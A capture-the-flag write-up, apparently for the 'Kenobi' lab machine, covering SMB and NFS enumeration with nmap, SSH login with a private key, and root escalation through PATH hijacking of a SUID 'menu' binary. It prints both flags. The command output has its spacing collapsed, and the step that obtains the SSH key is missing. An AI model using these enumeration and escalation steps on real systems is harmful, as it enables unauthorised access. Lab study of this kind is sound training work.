Samba is the standard Windows interoperability suite of programs for Linux and Unix. It allows end users to access and use files, printers and other commonly shared resources on a companies intranet or internet. Its often referred to as a network file system.
SMB has two ports, 445 and 139.
Using the nmap command above, how many shares have been found?
Answer: 3
Steps to Reproduce:
$nmap-p445--script=smb-enum-shares.nse,smb-enum-users.nse10.10.108.221-oNnmap-smbStartingNmap7.91 ( https://nmap.org ) at 2021-05-16 22:16 ISTNmapscanreportfor10.10.108.221Hostisup (0.17s latency).PORTSTATESERVICE445/tcpopenmicrosoft-dsHostscriptresults:|smb-enum-shares:|account_used:guest|\\10.10.108.221\IPC$:|Type:STYPE_IPC_HIDDEN|Comment:IPCService (kenobi server (Samba, Ubuntu))|Users:2|MaxUsers:<unlimited>|Path:C:\tmp|Anonymousaccess:READ/WRITE|Currentuseraccess:READ/WRITE|\\10.10.108.221\anonymous:|Type:STYPE_DISKTREE|Comment:|Users:0|MaxUsers:<unlimited>|Path:C:\home\kenobi\share|Anonymousaccess:READ/WRITE|Currentuseraccess:READ/WRITE|\\10.10.108.221\print$:|Type:STYPE_DISKTREE|Comment:PrinterDrivers|Users:0|MaxUsers:<unlimited>|Path:C:\var\lib\samba\printers|Anonymousaccess:<none>|_Currentuseraccess:<none>Nmapdone:1IPaddress (1 hostup) scanned in 25.05 seconds
What is the file can you see?
Answer: log.txt
Steps to Reproduce:
Connect to the anonymous SMB share with a blank password
$smbget-Rsmb://10.10.108.221/anonymousPasswordfor [root] connecting to //anonymous/10.10.108.221: UsingworkgroupWORKGROUP,userrootsmb://10.10.108.221/anonymous/log.txtDownloaded11.95kBin5seconds
What port is FTP running on?
Answer: 21
What mount can we see?
Answer: /var
Steps to Reproduce:
Nmap port scan will have shown port 111 running the service rpcbind. This is just a server that converts remote procedure call (RPC) program number into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number its prepared to serve.
In our case, port 111 is access to a network file system. Lets use nmap to enumerate this.
$nmap-p111--script=nfs-ls,nfs-statfs,nfs-showmount10.10.108.221StartingNmap7.91 ( https://nmap.org ) at 2021-05-16 22:28 ISTNmapscanreportfor10.10.108.221Hostisup (0.17s latency).PORTSTATESERVICE111/tcpopenrpcbind|nfs-ls:Volume/var|access:ReadLookupNoModifyNoExtendNoDeleteNoExecute|PERMISSIONUIDGIDSIZETIMEFILENAME|rwxr-xr-x0040962019-09-04T08:53:24.|rwxr-xr-x0040962019-09-04T12:27:33..|rwxr-xr-x0040962019-09-04T12:09:49backups|rwxr-xr-x0040962019-09-04T10:37:44cache|rwxrwxrwt0040962019-09-04T08:43:56crash|rwxrwsr-x05040962016-04-12T20:14:23local|rwxrwxrwx0092019-09-04T08:41:33lock|rwxrwxr-x010840962019-09-04T10:37:44log|rwxr-xr-x0040962019-01-29T23:27:41snap|rwxr-xr-x0040962019-09-04T08:53:24www|_|nfs-showmount:|_/var*|nfs-statfs:|Filesystem1K-blocksUsedAvailableUse%MaxfilesizeMaxlink|_/var9204224.01836536.06877092.022%16.0T32000Nmapdone:1IPaddress (1 hostup) scanned in 3.02 seconds
Gain initial access with ProFtpd
What is the version of ProFtpd?
Answer: 1.3.5
Steps to Reproduce: Check out the nmap results or connect using nc <MACHINE_IP> 21.
What is Kenobi's user flag (/home/kenobi/user.txt)?
Answer: d0b0f3f53b6caa532a83915e19224899
Steps to Reproduce:
$chmod600id_rsa$ssh-iid_rsakenobi@10.10.108.221Theauthenticityofhost'10.10.108.221 (10.10.108.221)'cantbeestablished.ECDSAkeyfingerprintisSHA256:uUzATQRA9mwUNjGY6h0B/wjpaZXJasCPBY30BvtMsPI.Areyousureyouwanttocontinueconnecting (yes/no/[fingerprint])? yesWarning:Permanentlyadded'10.10.108.221' (ECDSA) to the list of known hosts.WelcometoUbuntu16.04.6LTS (GNU/Linux 4.8.0-58-genericx86_64)*Documentation:https://help.ubuntu.com*Management:https://landscape.canonical.com*Support:https://ubuntu.com/advantage103packagescanbeupdated.65updatesaresecurityupdates.Lastlogin:WedSep407:10:152019from192.168.1.147Torunacommandasadministrator (user "root"), use "sudo <command>".See"man sudo_root"fordetails.kenobi@kenobi:~$lsshareuser.txtkenobi@kenobi:~$catuser.txtd0b0f3f53b6caa532a83915e19224899
Privilege Escalation with Path Variable Manipulation
SUID bits can be dangerous, some binaries such as passwd need to be run with elevated privileges (as its resetting your password on the system), however other custom files could that have the SUID bit can lead to all sorts of issues.
Usually in such vulnerable machines, we can find the binaries like /usr/bin/sudo and /usr/bin/su having SUID bit set! But we can't exploit this becuase, we don't have kenobi's password.
So, /usr/bin/menu seemed to be out of the ordinary.
Run the binary, how many options appear?
Answer: 3
Steps to Reproduce:
$/usr/bin/menu***************************************1.statuscheck2.kernelversion3.ifconfig** Enter your choice :
Finding the approriate binaries
On running the the various options of the /usr/bin/menu, we find that the three binaries are being run as root:
/usr/bin/curl (curl -I localhost)
/usr/bin/uname (uname -r)
/sbin/ifconfig (ipconfig)
kenobi@kenobi:~$/usr/bin/menu***************************************1.statuscheck2.kernelversion3.ifconfig** Enter your choice :1HTTP/1.1200OKDate:Sun,16May202117:33:24GMTServer:Apache/2.4.18 (Ubuntu)Last-Modified:Wed,04Sep201909:07:20GMTETag:"c8-591b6884b6ed2"Accept-Ranges:bytesContent-Length:200Vary:Accept-EncodingContent-Type:text/htmlkenobi@kenobi:~$/usr/bin/menu***************************************1.statuscheck2.kernelversion3.ifconfig** Enter your choice :24.8.0-58-generickenobi@kenobi:~$/usr/bin/menu***************************************1.statuscheck2.kernelversion3.ifconfig** Enter your choice :3eth0Linkencap:EthernetHWaddr02:f5:a8:1e:1a:65inetaddr:10.10.108.221Bcast:10.10.255.255Mask:255.255.0.0inet6addr:fe80::f5:a8ff:fe1e:1a65/64Scope:LinkUPBROADCASTRUNNINGMULTICASTMTU:9001Metric:1RXpackets:82827errors:0dropped:0overruns:0frame:0TXpackets:79967errors:0dropped:0overruns:0carrier:0collisions:0txqueuelen:1000RXbytes:3791786 (3.7 MB) TX bytes:4548369 (4.5MB)loLinkencap:LocalLoopbackinetaddr:127.0.0.1Mask:255.0.0.0inet6addr:::1/128Scope:HostUPLOOPBACKRUNNINGMTU:65536Metric:1RXpackets:214errors:0dropped:0overruns:0frame:0TXpackets:214errors:0dropped:0overruns:0carrier:0collisions:0txqueuelen:1RXbytes:16037 (16.0 KB) TX bytes:16037 (16.0KB)
Manipulating the Path Variable
Copy the /bin/sh binary to curl in the tmp directory: echo /bin/sh > curl
Change the permission to 777: chmod 777 curl.
Modify the PATH variable, so the /tmp directory is checked first.
Execute the /usr/bin/menu binary and choose the option 1.
kenobi@kenobi:/tmp$/usr/bin/menu***************************************1.statuscheck2.kernelversion3.ifconfig** Enter your choice :1# iduid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
What is the root flag (/root/root.txt)?
Answer: 177b3cd8562289f37382721c28381f02
Steps to Reproduce:
# cd /root# lsroot.txt# cat root.txt177b3cd8562289f37382721c28381f02